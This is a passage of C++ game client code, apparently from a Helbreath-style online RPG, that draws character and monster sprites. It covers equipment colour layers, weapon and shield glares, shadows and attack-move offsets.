				else m_pSprite[iHelmIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iHelmColor] -m_wR[0], m_wG[iHelmColor] -m_wG[0], m_wB[iHelmColor] -m_wB[0], dwTime);
			}

			if ((iMantleIndex != -1) && (_cMantleDrawingOrder[_tmp_cDir] == 2))
			{	if (iMantleColor == 0)
					 m_pSprite[iMantleIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else m_pSprite[iMantleIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
			}

			if (((_tmp_sAppr2 & 0x000F) == 8) && (iShieldGlare == 1))
			{	m_pEffectSpr[45]->PutTransSprite(sX -13, sY -34, 0, dwTime);
			}else
			if (iShieldIndex != -1)
			{	if (iShieldColor == 0)
					 m_pSprite[iShieldIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else m_pSprite[iShieldIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iShieldColor] -m_wR[0], m_wG[iShieldColor] -m_wG[0], m_wB[iShieldColor] -m_wB[0], dwTime);
				switch (iShieldGlare) {
				case 0: break;
				case 1: m_pEffectSpr[45]->PutTransSprite(sX -13, sY -34, 0, dwTime);
				case 2: m_pSprite[iShieldIndex]->PutTransSpriteRGB(sX, sY,  (_tmp_cDir-1) * 8 + _tmp_cFrame, 0, m_iDrawFlag, 0, dwTime); break; // Green Glare
				case 3: m_pSprite[iShieldIndex]->PutTransSpriteRGB(sX, sY,  (_tmp_cDir-1) * 8 + _tmp_cFrame, 0, 0, m_iDrawFlag, dwTime); break; // Blue Glare
			}	}

			if ((iMantleIndex != -1) && (_cMantleDrawingOrder[_tmp_cDir] == 1))
			{	if (iMantleColor == 0)
					 m_pSprite[iMantleIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else m_pSprite[iMantleIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
			}
		}else
		{	switch (_tmp_sOwnerType) { // Pas d'ombre pour ces mobs
			case 10: // Slime
			case 35: // Energy Sphere
			
			case 81: // Abaddon
			case 91: // Gate
				break;
			default:
				if (m_cDetailLevel != 0)
				{	if (sX < 50)
						 m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutShadowSpriteClip(sX, sY, _tmp_cFrame, dwTime);
					else m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutShadowSprite(sX, sY, _tmp_cFrame, dwTime);
				}
				break;
			}
			if (_tmp_sOwnerType == 35)
				m_pEffectSpr[0]->PutTransSprite(sX, sY, 1, dwTime);

			if (_tmp_sOwnerType == 81) // Abaddon
			{	m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutTransSprite(sX, sY, _tmp_cFrame, dwTime);
			}else if (bInvy == TRUE)
				m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutTransSprite(sX, sY, _tmp_cFrame, dwTime);
			else
			{	if ((_tmp_iStatus & 0x40) != 0)
					 m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutSpriteRGB(sX, sY, _tmp_cFrame, m_wR[10] -m_wR[0]/2, m_wG[10] -m_wG[0]/2, m_wB[10] -m_wB[0]/2, dwTime);
				else m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutSpriteFast(sX, sY, _tmp_cFrame, dwTime);
			}

			SetRect(&m_rcBodyRect, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.left, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.top,
				    m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.right, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.bottom);


			if ((iMantleIndex != -1) && (_cMantleDrawingOrder[_tmp_cDir] == 0))
			{	if (iMantleColor == 0)
					 m_pSprite[iMantleIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else m_pSprite[iMantleIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
			}

			if (iUndiesIndex != -1) m_pSprite[iUndiesIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);

			if ((iHairIndex   != -1) && (iHelmIndex == -1))
			{	_GetHairColorRGB(((_tmp_sAppr1 & 0x00F0) >> 4), &iR, &iG, &iB);
				m_pSprite[iHairIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, iR, iG, iB, dwTime);
			}

			if ((iBootsIndex != -1) && (iSkirtDraw == 1)) {
				if (iBootsColor == 0)
					 m_pSprite[iBootsIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else m_pSprite[iBootsIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iBootsColor] -m_wR[0], m_wG[iBootsColor] -m_wG[0], m_wB[iBootsColor] -m_wB[0], dwTime);
			}

			if (iPantsIndex != -1)
			{	if (iPantsColor == 0)
					 m_pSprite[iPantsIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else m_pSprite[iPantsIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iPantsColor] -m_wR[0], m_wG[iPantsColor] -m_wG[0], m_wB[iPantsColor] -m_wB[0], dwTime);
			}

			if (iArmArmorIndex != -1)
			{	if (iArmColor == 0)
					 m_pSprite[iArmArmorIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else m_pSprite[iArmArmorIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iArmColor] -m_wR[0], m_wG[iArmColor] -m_wG[0], m_wB[iArmColor] -m_wB[0], dwTime);
			}

			if ((iBootsIndex != -1) && (iSkirtDraw == 0))
			{	if (iBootsColor == 0)
					 m_pSprite[iBootsIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else m_pSprite[iBootsIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iBootsColor] -m_wR[0], m_wG[iBootsColor] -m_wG[0], m_wB[iBootsColor] -m_wB[0], dwTime);
			}

			if (iBodyArmorIndex != -1)
			{	if (iArmorColor == 0)
					 m_pSprite[iBodyArmorIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else m_pSprite[iBodyArmorIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iArmorColor] -m_wR[0], m_wG[iArmorColor] -m_wG[0], m_wB[iArmorColor] -m_wB[0], dwTime);
			}

			if (iHelmIndex != -1)
			{	if (iHelmColor == 0)
					 m_pSprite[iHelmIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else m_pSprite[iHelmIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iHelmColor] -m_wR[0], m_wG[iHelmColor] -m_wG[0], m_wB[iHelmColor] -m_wB[0], dwTime);
			}

			if ((iMantleIndex != -1) && (_cMantleDrawingOrder[_tmp_cDir] == 2))
			{	if (iMantleColor == 0)
					 m_pSprite[iMantleIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else m_pSprite[iMantleIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
			}

			if (iShieldIndex != -1)
			{	if (iShieldColor == 0)
					 m_pSprite[iShieldIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else m_pSprite[iShieldIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iShieldColor] -m_wR[0], m_wG[iShieldColor] -m_wG[0], m_wB[iShieldColor] -m_wB[0], dwTime);
				switch (iShieldGlare) {
				case 0: break;
				case 1: m_pEffectSpr[45]->PutTransSprite(sX -13, sY -34, 0, dwTime);
				case 2: m_pSprite[iShieldIndex]->PutTransSpriteRGB(sX, sY,  (_tmp_cDir-1) * 8 + _tmp_cFrame, 0, m_iDrawFlag, 0, dwTime); break; // Green Glare
				case 3: m_pSprite[iShieldIndex]->PutTransSpriteRGB(sX, sY,  (_tmp_cDir-1) * 8 + _tmp_cFrame, 0, 0, m_iDrawFlag, dwTime); break; // Blue Glare
			}	}

			if ((iMantleIndex != -1) && (_cMantleDrawingOrder[_tmp_cDir] == 1))
			{	if (iMantleColor == 0)
					 m_pSprite[iMantleIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else m_pSprite[iMantleIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
			}

			if (iWeaponIndex != -1)
			{	if (iWeaponColor == 0)
					 m_pSprite[iWeaponIndex]->PutSpriteFast(sX, sY, _tmp_cFrame, dwTime);
				else m_pSprite[iWeaponIndex]->PutSpriteRGB(sX, sY, _tmp_cFrame, m_wWR[iWeaponColor] -m_wR[0], m_wWG[iWeaponColor] -m_wG[0], m_wWB[iWeaponColor] -m_wB[0], dwTime);
				DKGlare(iWeaponColor, iWeaponIndex, &iWeaponGlare);
				switch (iWeaponGlare) {
				case 0: break;
				case 1: m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX, sY,  _tmp_cFrame, m_iDrawFlag, 0, 0, dwTime); break; // Red Glare
				case 2: m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX, sY,  _tmp_cFrame, 0, m_iDrawFlag, 0, dwTime); break; // Green Glare
				case 3: m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX, sY,  _tmp_cFrame, 0, 0, m_iDrawFlag, dwTime); break; // Blue Glare
				}
				if (_tmp_cFrame == 3) m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX, sY, _tmp_cFrame -1, m_wR[10] -(m_wR[0]/3), m_wG[10] -(m_wG[0]/3), m_wB[10] -(m_wB[0]/3), dwTime);
		}	}

		if ((_tmp_iStatus & 0x20) != 0) // Berserk
			m_pSprite[iBodyIndex + (_tmp_cDir -1)]->PutTransSpriteRGB(sX, sY, _tmp_cFrame, 0, -5, -5, dwTime);
		DrawAngel((_tmp_cDir - 1), sX+20, sY-20, _tmp_cFrame%8, dwTime);
		DrawWanted(sX, sY, dwTime); // Wanted System
		CheckActiveAura2(sX, sY, dwTime,  _tmp_sOwnerType);

		//50Cent - Capture The Flag
		DrawFlagCarrier(sX, sY, _tmp_cFrame, dwTime);

	}else if( strlen(_tmp_cName) > 0 )
	{	if( (_tmp_sOwnerType>=1) && (_tmp_sOwnerType<=6) ) DrawObjectName(sX, sY, _tmp_cName, _tmp_iStatus);
		//50Cent - HP Bar
		else
		{
			DrawNpcName(sX, sY, _tmp_sOwnerType, _tmp_iStatus);
	}	}
	if (_tmp_iChatIndex != NULL)
	{	if ((m_pChatMsgList[_tmp_iChatIndex] != NULL) && (m_pChatMsgList[_tmp_iChatIndex]->m_iObjectID == _tmp_wObjectID))
		{	m_pChatMsgList[_tmp_iChatIndex]->m_sX = sX;
			m_pChatMsgList[_tmp_iChatIndex]->m_sY = sY;
		}else
		{	m_pMapData->ClearChatMsg(indexX, indexY);
	}	}

	// Snoopy: Abaddon effects
	if (_tmp_sOwnerType == 81)
	{	int randFrame = _tmp_cFrame % 12;
		m_pEffectSpr[154]->PutTransSprite70(sX-50	, sY-50		, randFrame, dwTime);
		m_pEffectSpr[155]->PutTransSprite70(sX-20	, sY-80		, randFrame, dwTime);
		m_pEffectSpr[156]->PutTransSprite70(sX+70	, sY-50		, randFrame, dwTime);
		m_pEffectSpr[157]->PutTransSprite70(sX-30	, sY		, randFrame, dwTime);
		m_pEffectSpr[158]->PutTransSprite70(sX-60	, sY+90		, randFrame, dwTime);
		m_pEffectSpr[159]->PutTransSprite70(sX+65	, sY+85		, randFrame, dwTime);
		switch (_tmp_cDir) {
		case 1:
			m_pEffectSpr[153]->PutTransSprite70(sX		, sY+108 , _tmp_iEffectFrame %28, dwTime);
			m_pEffectSpr[164]->PutTransSprite70(sX-50	, sY+10	, _tmp_iEffectFrame %15, dwTime);
			break;
		case 2:
			m_pEffectSpr[153]->PutTransSprite70(sX		, sY+95	, _tmp_iEffectFrame %28, dwTime);
			m_pEffectSpr[164]->PutTransSprite70(sX-70	, sY+10	, _tmp_iEffectFrame %15, dwTime);
			break;
		case 3:
			m_pEffectSpr[153]->PutTransSprite70(sX		, sY+105 , _tmp_iEffectFrame %28, dwTime);
			m_pEffectSpr[164]->PutTransSprite70(sX-90	, sY+10	, _tmp_iEffectFrame %15, dwTime);
			break;
		case 4:
			m_pEffectSpr[153]->PutTransSprite70(sX-35	, sY+100 , _tmp_iEffectFrame %28, dwTime);
			m_pEffectSpr[164]->PutTransSprite70(sX-80	, sY+10	, _tmp_iEffectFrame %15, dwTime);
			break;
		case 5:
			m_pEffectSpr[153]->PutTransSprite70(sX		, sY+95	, _tmp_iEffectFrame %28, dwTime);
			m_pEffectSpr[164]->PutTransSprite70(sX-65	, sY-5	, _tmp_iEffectFrame %15, dwTime);
			break;
		case 6:
			m_pEffectSpr[153]->PutTransSprite70(sX+45	, sY+95	, _tmp_iEffectFrame %28, dwTime);
			m_pEffectSpr[164]->PutTransSprite70(sX-31	, sY+10	, _tmp_iEffectFrame %15, dwTime);
			break;
		case 7:
			m_pEffectSpr[153]->PutTransSprite70(sX+40	, sY+110 , _tmp_iEffectFrame %28, dwTime);
			m_pEffectSpr[164]->PutTransSprite70(sX-30	, sY+10	, _tmp_iEffectFrame %15, dwTime);
			break;
		case 8:
			m_pEffectSpr[153]->PutTransSprite70(sX+20	, sY+110 , _tmp_iEffectFrame %28, dwTime);
			m_pEffectSpr[164]->PutTransSprite70(sX-20	, sY+16	, _tmp_iEffectFrame %15, dwTime);
			break;
	}	}
	if ( (m_pSprite[iBodyIndex + (_tmp_cDir -1)]->m_rcBound.top != -1) &&
		 (m_pSprite[iBodyIndex + (_tmp_cDir -1)]->m_rcBound.top < msY) &&
		 (m_pSprite[iBodyIndex + (_tmp_cDir -1)]->m_rcBound.bottom > msY) &&
		 (m_pSprite[iBodyIndex + (_tmp_cDir -1)]->m_rcBound.left < msX) &&
		 (m_pSprite[iBodyIndex + (_tmp_cDir -1)]->m_rcBound.right > msX) ) return TRUE;
	return FALSE;
}

BOOL   CGame::DrawObject_OnAttackMove(int indexX, int indexY, int sX, int sY, BOOL bTrans, DWORD dwTime, int msX, int msY)
{int iBodyIndex, iUndiesIndex, iHairIndex, iArmArmorIndex, iBodyArmorIndex, iPantsIndex, iBootsIndex, iHelmIndex, iR, iG, iB;
 int iWeaponIndex, iWeapon, iAdd, iShieldIndex, iMantleIndex, dx, dy, dsx, dsy;
 int cFrameMoveDots;
 BOOL bInv = FALSE, bDashDraw = FALSE;
 int iWeaponGlare, iShieldGlare;
 int iWeaponColor, iShieldColor, iArmorColor, iMantleColor, iArmColor, iPantsColor, iBootsColor, iHelmColor;
 int iSkirtDraw = 0;

	if(_tmp_sOwnerType == 35 || _tmp_sOwnerType == 81 ) bInv = TRUE; //Energy-Ball,Wyvern

	if (m_cDetailLevel == 0)
	{	iWeaponColor = 0;
		iShieldColor = 0;
		iArmorColor  = 0;
		iMantleColor = 0;
		iArmColor    = 0;
		iPantsColor  = 0;
		iBootsColor  = 0;
		iHelmColor   = 0;
	}else
	{	iWeaponColor = (_tmp_iApprColor & 0xF0000000) >> 28;
		iShieldColor = (_tmp_iApprColor & 0x0F000000) >> 24;
		iArmorColor  = (_tmp_iApprColor & 0x00F00000) >> 20;
		iMantleColor = (_tmp_iApprColor & 0x000F0000) >> 16;
		iArmColor    = (_tmp_iApprColor & 0x0000F000) >> 12;
		iPantsColor  = (_tmp_iApprColor & 0x00000F00) >> 8;
		iBootsColor  = (_tmp_iApprColor & 0x000000F0) >> 4;
		iHelmColor   = (_tmp_iApprColor & 0x0000000F);
	}
	iWeaponGlare = (_tmp_sAppr4 & 0x000C) >> 2;
	iShieldGlare = (_tmp_sAppr4 & 0x0003);
	if ( (_tmp_iStatus & 0x10) != 0)
	{	if (memcmp(m_cPlayerName, _tmp_cName, 10) == 0) bInv = TRUE;
		else if (bCheckItemEquiped("NecklaceOfBeholder") == true) bInv = TRUE; //beholder neck
		else if( _iGetFOE(_tmp_iStatus) == 1 ) bInv = TRUE;
 		else return FALSE;
	}

	switch (_tmp_cFrame) {
	case 4:  _tmp_cFrame = 4; break;
	case 5:  _tmp_cFrame = 4; break;
	case 6:  _tmp_cFrame = 4; break;
	case 7:  _tmp_cFrame = 4; break;
	case 8:  _tmp_cFrame = 4; break;
	case 9:  _tmp_cFrame = 4; break;
	case 10: _tmp_cFrame = 5; break;
	case 11: _tmp_cFrame = 6; break;
	case 12: _tmp_cFrame = 7; break;
	}

	switch (_tmp_sOwnerType) {
	case 1:
	case 2:
	case 3:
		if ((_tmp_sAppr2 & 0xF000) != 0) {
			iWeapon = ((_tmp_sAppr2 & 0x0FF0) >> 4);
			if (iWeapon == 0) iAdd = 6;
			if ((iWeapon >= 1)  && (iWeapon <= 39)) iAdd = 6;
			if ((iWeapon >= 40) && (iWeapon <= 59)) iAdd = 7;
			iBodyIndex   = 500 + (_tmp_sOwnerType - 1 )*8*15 + (iAdd * 8);
			iUndiesIndex = DEF_SPRID_UNDIES_M + (_tmp_sAppr1 & 0x000F)*15 + iAdd;
			iHairIndex	 = DEF_SPRID_HAIR_M + ((_tmp_sAppr1 & 0x0F00) >> 8)*15 + iAdd;
			if ((_tmp_sAppr4 & 0x80) == 0)
			{	if (((_tmp_sAppr3 & 0xF000) >> 12) == 0)
					 iBodyArmorIndex = -1;
				else iBodyArmorIndex = DEF_SPRID_BODYARMOR_M + ((_tmp_sAppr3 & 0xF000) >> 12)*15 + iAdd;
			}
			if ((_tmp_sAppr3 & 0x000F) == 0)
				 iArmArmorIndex = -1;
			else iArmArmorIndex = DEF_SPRID_BERK_M + (_tmp_sAppr3 & 0x000F)*15 + iAdd;
			if ((_tmp_sAppr3 & 0x0F00) == 0)
				 iPantsIndex = -1;
			else iPantsIndex = DEF_SPRID_LEGG_M + ((_tmp_sAppr3 & 0x0F00) >> 8)*15 + iAdd;
			if (((_tmp_sAppr4 & 0xF000) >> 12) == 0)
				 iBootsIndex = -1;
			else iBootsIndex = DEF_SPRID_BOOT_M + ((_tmp_sAppr4 & 0xF000) >> 12)*15 + iAdd;
			if (((_tmp_sAppr2 & 0x0FF0) >> 4) == 0)
				iWeaponIndex = -1;
			else iWeaponIndex = DEF_SPRID_WEAPON_M + ((_tmp_sAppr2 & 0x0FF0) >> 4)*64 + 8*4 + (_tmp_cDir - 1);
			if ((_tmp_sAppr2 & 0x000F) == 0)
				iShieldIndex = -1;
			else iShieldIndex = DEF_SPRID_SHIELD_M + (_tmp_sAppr2 & 0x000F)*8 + 4;
			if ((_tmp_sAppr4 & 0x0F00) == 0)
				 iMantleIndex = -1;
			else iMantleIndex = DEF_SPRID_MANTLE_M + ((_tmp_sAppr4 & 0x0F00) >> 8)*15 + iAdd;
			if ((_tmp_sAppr3 & 0x00F0) == 0)
				 iHelmIndex = -1;
			else iHelmIndex = DEF_SPRID_HEAD_M + ((_tmp_sAppr3 & 0x00F0) >> 4)*15 + iAdd;
		}else
		{ 	iBodyIndex   = 500  + (_tmp_sOwnerType - 1 )*8*15 + (5 * 8);
			iUndiesIndex = DEF_SPRID_UNDIES_M + (_tmp_sAppr1 & 0x000F)*15 + 5;
			iHairIndex	 = DEF_SPRID_HAIR_M + ((_tmp_sAppr1 & 0x0F00) >> 8)*15 + 5;
			if ((_tmp_sAppr4 & 0x80) == 0)
			{	if (((_tmp_sAppr3 & 0xF000) >> 12) == 0)
					 iBodyArmorIndex = -1;
				else iBodyArmorIndex = DEF_SPRID_BODYARMOR_M + ((_tmp_sAppr3 & 0xF000) >> 12)*15 + 5;
			}
			if ((_tmp_sAppr3 & 0x000F) == 0)
				 iArmArmorIndex = -1;
			else iArmArmorIndex = DEF_SPRID_BERK_M + (_tmp_sAppr3 & 0x000F)*15 + 5;
			if ((_tmp_sAppr3 & 0x0F00) == 0)
				 iPantsIndex = -1;
			else iPantsIndex = DEF_SPRID_LEGG_M + ((_tmp_sAppr3 & 0x0F00) >> 8)*15 + 5;
			if (((_tmp_sAppr4 & 0xF000) >> 12) == 0)
				 iBootsIndex = -1;
			else iBootsIndex = DEF_SPRID_BOOT_M + ((_tmp_sAppr4 & 0xF000) >> 12)*15 + 5;
			if ((_tmp_sAppr4 & 0x0F00) == 0)
				 iMantleIndex = -1;
			else iMantleIndex = DEF_SPRID_MANTLE_M + ((_tmp_sAppr4 & 0x0F00) >> 8)*15 + 5;
			if ((_tmp_sAppr3 & 0x00F0) == 0)
				 iHelmIndex = -1;
			else iHelmIndex = DEF_SPRID_HEAD_M + ((_tmp_sAppr3 & 0x00F0) >> 4)*15 + 5;
			iWeaponIndex = -1;
			iShieldIndex = -1;
		}
		break;

	case 4:
	case 5:
	case 6:
		if (((_tmp_sAppr3 & 0x0F00) >> 8) == 1) iSkirtDraw = 1;
		if ((_tmp_sAppr2 & 0xF000) != 0) {
			iWeapon = ((_tmp_sAppr2 & 0x0FF0) >> 4);
			if (iWeapon == 0) iAdd = 6;
			if ((iWeapon >= 1)  && (iWeapon <= 39)) iAdd = 6;
			if ((iWeapon >= 40) && (iWeapon <= 59)) iAdd = 7;
			iBodyIndex   = 500 + (_tmp_sOwnerType - 1 )*8*15 + (iAdd * 8);
			iUndiesIndex = DEF_SPRID_UNDIES_W + (_tmp_sAppr1 & 0x000F)*15 + iAdd;
			iHairIndex	 = DEF_SPRID_HAIR_W + ((_tmp_sAppr1 & 0x0F00) >> 8)*15 + iAdd;
			if ((_tmp_sAppr4 & 0x80) == 0)
			{	if (((_tmp_sAppr3 & 0xF000) >> 12) == 0)
					 iBodyArmorIndex = -1;
				else iBodyArmorIndex = DEF_SPRID_BODYARMOR_W + ((_tmp_sAppr3 & 0xF000) >> 12)*15 + iAdd;
			}
			if ((_tmp_sAppr3 & 0x000F) == 0)
				 iArmArmorIndex = -1;
			else iArmArmorIndex = DEF_SPRID_BERK_W + (_tmp_sAppr3 & 0x000F)*15 + iAdd;
			if ((_tmp_sAppr3 & 0x0F00) == 0)
				 iPantsIndex = -1;
			else iPantsIndex = DEF_SPRID_LEGG_W + ((_tmp_sAppr3 & 0x0F00) >> 8)*15 + iAdd;
			if (((_tmp_sAppr4 & 0xF000) >> 12) == 0)
				 iBootsIndex = -1;
			else iBootsIndex = DEF_SPRID_BOOT_W + ((_tmp_sAppr4 & 0xF000) >> 12)*15 + iAdd;
			if (((_tmp_sAppr2 & 0x0FF0) >> 4) == 0)
				iWeaponIndex = -1;
			else iWeaponIndex = DEF_SPRID_WEAPON_W + ((_tmp_sAppr2 & 0x0FF0) >> 4)*64 + 8*4 + (_tmp_cDir - 1);
			if ((_tmp_sAppr2 & 0x000F) == 0)
				iShieldIndex = -1;
			else iShieldIndex = DEF_SPRID_SHIELD_W + (_tmp_sAppr2 & 0x000F)*8 + 4;
			if ((_tmp_sAppr4 & 0x0F00) == 0)
				 iMantleIndex = -1;
			else iMantleIndex = DEF_SPRID_MANTLE_W + ((_tmp_sAppr4 & 0x0F00) >> 8)*15 + iAdd;
			if ((_tmp_sAppr3 & 0x00F0) == 0)
				 iHelmIndex = -1;
			else iHelmIndex = DEF_SPRID_HEAD_W + ((_tmp_sAppr3 & 0x00F0) >> 4)*15 + iAdd;
		}else
		{	iBodyIndex   = 500  + (_tmp_sOwnerType - 1 )*8*15 + (5 * 8);
			iUndiesIndex = DEF_SPRID_UNDIES_W + (_tmp_sAppr1 & 0x000F)*15 + 5;
			iHairIndex	 = DEF_SPRID_HAIR_W + ((_tmp_sAppr1 & 0x0F00) >> 8)*15 + 5;
			if ((_tmp_sAppr4 & 0x80) == 0)
			{	if (((_tmp_sAppr3 & 0xF000) >> 12) == 0)
					 iBodyArmorIndex = -1;
				else iBodyArmorIndex = DEF_SPRID_BODYARMOR_W + ((_tmp_sAppr3 & 0xF000) >> 12)*15 + 5;
			}
			if ((_tmp_sAppr3 & 0x000F) == 0)
				 iArmArmorIndex = -1;
			else iArmArmorIndex = DEF_SPRID_BERK_W + (_tmp_sAppr3 & 0x000F)*15 + 5;
			if ((_tmp_sAppr3 & 0x0F00) == 0)
				 iPantsIndex = -1;
			else iPantsIndex = DEF_SPRID_LEGG_W + ((_tmp_sAppr3 & 0x0F00) >> 8)*15 + 5;
			if (((_tmp_sAppr4 & 0xF000) >> 12) == 0)
				 iBootsIndex = -1;
			else iBootsIndex = DEF_SPRID_BOOT_W + ((_tmp_sAppr4 & 0xF000) >> 12)*15 + 5;
			if ((_tmp_sAppr4 & 0x0F00) == 0)
				 iMantleIndex = -1;
			else iMantleIndex = DEF_SPRID_MANTLE_W + ((_tmp_sAppr4 & 0x0F00) >> 8)*15 + 5;
			if ((_tmp_sAppr3 & 0x00F0) == 0)
				 iHelmIndex = -1;
			else iHelmIndex = DEF_SPRID_HEAD_W + ((_tmp_sAppr3 & 0x00F0) >> 4)*15 + 5;
			iWeaponIndex = -1;
			iShieldIndex = -1;
		}
		break;
	default:
		iBodyIndex =  DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (2 * 8);
		iUndiesIndex    = -1;
		iHairIndex      = -1;
		iBodyArmorIndex = -1;
		iArmArmorIndex  = -1;
		iBootsIndex     = -1;
		iPantsIndex     = -1;
		iWeaponIndex    = -1;
		iShieldIndex    = -1;
		iMantleIndex    = -1;
		iHelmIndex      = -1;
		break;
	}
	dx = 0;
	dy = 0;
	if ((_tmp_cFrame >= 1) && (_tmp_cFrame <= 3))
	{	switch (_tmp_cFrame) {
		case 1: cFrameMoveDots = 26; break;
		case 2: cFrameMoveDots = 16; break;
		case 3: cFrameMoveDots = 0;  break;
		}
		switch (_tmp_cDir) {
		case 1 : dy =  cFrameMoveDots; break;
		case 2 : dy =  cFrameMoveDots; dx = -cFrameMoveDots; break;
		case 3 : dx = -cFrameMoveDots; break;
		case 4 : dx = -cFrameMoveDots; dy = -cFrameMoveDots; break;
		case 5 : dy = -cFrameMoveDots; break;
		case 6 : dy = -cFrameMoveDots; dx =  cFrameMoveDots; break;
		case 7 : dx =  cFrameMoveDots; break;
		case 8 : dx =  cFrameMoveDots; dy =  cFrameMoveDots; break;
		}
		switch (_tmp_cFrame) {
		case 1: dy++;    break;
		case 2: dy += 2; break;
		case 3: dy++;    break;
		}
		switch (_tmp_cFrame) {
		case 2: bDashDraw = TRUE; cFrameMoveDots = 26; break;
		case 3: bDashDraw = TRUE; cFrameMoveDots = 16; break;
		}
		dsx = 0;
		dsy = 0;
		switch (_tmp_cDir) {
		case 1 : dsy =  cFrameMoveDots; break;
		case 2 : dsy =  cFrameMoveDots; dsx = -cFrameMoveDots; break;
		case 3 : dsx = -cFrameMoveDots; break;
		case 4 : dsx = -cFrameMoveDots; dsy = -cFrameMoveDots; break;
		case 5 : dsy = -cFrameMoveDots; break;
		case 6 : dsy = -cFrameMoveDots; dsx =  cFrameMoveDots; break;
		case 7 : dsx =  cFrameMoveDots; break;
		case 8 : dsx =  cFrameMoveDots; dsy =  cFrameMoveDots; break;
		}
	}else if (_tmp_cFrame > 3)
	{	dx = 0;
		dy = 0;
	}else
	{	switch (_tmp_cDir) {
		case 1: dy = 32; break;
		case 2: dy = 32; dx = -32; break;
		case 3: dx = -32; break;
		case 4: dx = -32; dy = -32; break;
		case 5: dy = -32; break;
		case 6: dy = -32; dx = 32; break;
		case 7: dx = 32; break;
		case 8: dx = 32; dy = 32; break;
	}	}

	if (m_bIsCrusadeMode || m_bIsHeldenian) DrawObjectFOE(sX+dx, sY+dy, _tmp_cFrame);

	if (_tmp_iEffectType != 0) {
		switch (_tmp_iEffectType) {
		case 1: m_pEffectSpr[26]->PutTransSprite(sX+dx, sY+dy, _tmp_iEffectFrame, dwTime); break; // Special Ability: Attack Effect
		case 2: m_pEffectSpr[27]->PutTransSprite(sX+dx, sY+dy, _tmp_iEffectFrame, dwTime); break; // Special Ability: Protect Effect
		}
	}

	if (bTrans == FALSE)
	{	CheckActiveAura(sX+dx, sY+dy, dwTime, _tmp_sOwnerType);
		if (_cDrawingOrder[_tmp_cDir] == 1)
		{	if (iWeaponIndex != -1)
			{	if (iWeaponColor == 0)
					 m_pSprite[iWeaponIndex]->PutSpriteFast(sX+dx, sY+dy, _tmp_cFrame, dwTime);
